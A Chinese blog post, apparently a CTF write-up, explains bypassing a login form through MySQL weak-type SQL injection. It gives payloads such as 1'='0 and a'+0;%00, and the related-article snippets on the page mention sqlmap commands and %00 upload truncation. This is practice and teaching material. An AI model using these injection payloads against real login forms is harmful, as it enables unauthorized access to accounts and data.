CTF-登陆一下好么?

最新推荐文章于 2023-10-19 11:17:43 发布
最新推荐文章于 2023-10-19 11:17:43 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 安全技术 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37438418/article/details/80192622
版权




select * from user where username='用户名' and password='密码'  
利用  1'='1  0'='0


这样显然不行,因为查询到数据库中没有username=1 的元组,返回了0


而  0 !='1'  所以需要改为  

username= 1'='0

password= 1'='0


先看前面username那一块,由于两个等号是从左往右计算的, username=‘p’不存在就会返回0(false),而0=''则会返回1,这样where后面计算结果就变成了1 and 1,这样最后就会把数据表中所有的数据挑出来。
username= 1’=’0 
password= 1’=’0 
或者 
username=what’=’ 
password=what’=’ 
或者 
username:admin’=’ 
password:admin’=’ 


sql里面弱类型的比较,以下情况都会为true:
1='1'
1='1.0'
1='1后接字母(再后面有数字也可以)'
0='除了非0数字开头的字符串'


(2)利用mysql数据类型转换特性以及特殊截断符号“%00;”:


select * from table where username=0;  


select * from table where username='a'+0;  


这两句均会返回库中所有元组,就是说如果一个字符类型的变量接收到一个整形变量且值为0的时候,就会返回库中所有元组
(第二句'a'+0会进行强制类型转换,最后结果还是0)


其次,mysql的注释符号除了-- + , # ,/**/之外,还有;%00。
利用这两点,构造如下payload:
username=a'+0;%00&password=
就可以成功绕过了


遇到这种有登陆框的操作,显示看他是POST 还是GET
一般是想到用万能密码,但是这道题过滤了字符,那么万能密码就失效了


这道题给我的收获是,登录框也可以进行注入
Wh0ale
关注
专栏目录
BugkuCTF-Android-signin
Jaychouzzk
11-15 1235
0x01   start 先将这道题目下载下来,并且放入Android killer中   0x02  NEXT 因为在Android killer 中无法看到java源码 所以使用Androidtool Box工具 先将Sign_in.apk 改为Sign_in.zip 并且将内容解压出来,可以得到这些文件 然后使用Androidtool Box    然后...
mysql 登录框注入_CTF| SQL注入之login界面类
weixin_34609222的博客
01-19 2550
SQL注入是CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源:hacking lab inject 01~源代码有提...
CTF之登录一下好吗?
Unitue_逆流
04-09 1222
实验吧链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html 输入如下手工进行注入:
BugkuCTF 这是一个神奇的登陆
3tu6b0rn的博客
05-15 363
post注入 直接跑sqlmap吧 抓包到本地 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" admin_name存在注入点 查数据库 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tabl...
CTF-WEB 一个登录框SQL盲注
weixin_45887311的博客
04-24 1万+
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。 首先找注入点: 发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。 但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了) 开始尝试编写脚本,结果发现简单的reuqests解析不了<div>标签下的内容 ...
JIS-CTF:VulnUpload实战靶机搭建及玩耍攻略
星|Donstpast
04-03 1833
最近玩了一把子vulnhub的volnupload靶机,需要完整找出五个flag,我格局小,只是为了得到flag,所以,本文或许基础知识不会很多。主要是想体验那种实战夺旗的feel。另外也相当预自己的一个笔记吧。 该靶机下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 注:vulnhub中有很多优秀的实战靶机,自己可以下载下来去玩...
CTF-练习平台 Web writeup By Assassin 暂时完结
qq_43679818的博客
11-13 4373
CTF-练习平台 Web writeup By Assassin 暂时完结
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 7万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
关于CTF学习总结
m0_37496212的博客
02-26 2879
# -*-coding:utf-8-*- import requests import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' #不区分大小写的 flag = &amp;quot;&amp;quot; print(&amp;quot;Start&amp;quot;) for i in range(33): for payload in payloads: s
php文件包含读源码,CTF PHP文件包含--session
weixin_30045711的博客
03-12 716
PHP文件包含 Session首先了解一下PHP文件包含漏洞----包含session利用条件:session文件路径已知,且其中内容部分可控。姿势:php的session文件的保存路径可以在phpinfo的session.save_path看到。常见的php-session存放位置:/var/lib/php/sess_PHPSESSID/var/lib/php/sess_PHPSESSID/tm...
青少年CTF-web-signin
m0_63047884的博客
12-17 709
qsnctf-web-easy-signin,pathinfo漏洞上传绕过
ctf Sign_in.apk 解题笔记
u010490930的博客
10-19 208
ctf解题笔记
【实验吧】CTF_Web_登录一下好吗?
weixin_30457465的博客
11-01 202
实验吧CTF---Web篇 1. 打开登录地址(http://ctf5.shiyanbar.com/web/wonderkun/web/index.html),发现为一个登录界面,第一想到的是查看源代码,没有发现其他信息,然后输入万能密码1'or'1'='1,发现过滤了or ,但未过滤单引号(‘)等,如下图: 经过一些列测试,发现不但过滤了or,并且过滤了/ # --...
菜鸡做题·20200418会员登陆页面(CTF
wengbinqiang17的博客
04-18 1万+
题目地址:http://129.204.207.114 用火狐浏览器打开网址 对于登录框 一般思路是 •爆破,一般的题目用户名都是admin •Sql注入 •信息泄露 F12查看网页源代码 得到账号密码 账号:admin 密码:welcome_to_ctf 登录,进入flag.php页面 当我们成功登录时就能将flag.txt的内容写进session了,而且会将对应的$_SESSION['us...
BUUCTF-----signin
qq_64558075的博客
12-09 572
1.拿到文件,查壳 收集信息,无壳,64位程序 2.拖入ida中 程序调用了 __gmpz_init_set_str 函数,这是一个 GNU 高精度算法库,在以前的RSA加密中见过很多次,加上65537这个比较敏感的数据,就基本确定了这是道RSA加密 可以从程序的本身得知 公钥N=103461035900816914121390101299049044413950405173712170434161686539878160984549 E=65537 加密后的密文为:ad939ff5.
web——ctf (登陆一下好吗??)
h1012946585的博客
04-08 5764
登陆一下好吗??  不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!flag格式:ctf{xxxx} 解题链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html                     ...
“百度杯”CTF比赛 十月场 -------Login
大方子
08-01 3342
============================================================= 个人收获: 1.多观察网页的源代码 2.多留意http的访问信息 3.多留意http头参数的变化 4.收获了unserialize,gzuncompress参数的认识 ================================================...
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3546
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
CTF web题总结--爆破用户名密码
bob的博客
08-31 1万+
1、burp爆破用户名密码 2、id,userid,useId多试几次 3、爆破后台目录,index.php,users.php,login.php,flag.php 4、脚本:# -*- coding:utf-8 -*- import httplib import re import urllibclass Attacker: def __init__(self, mode, url)
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值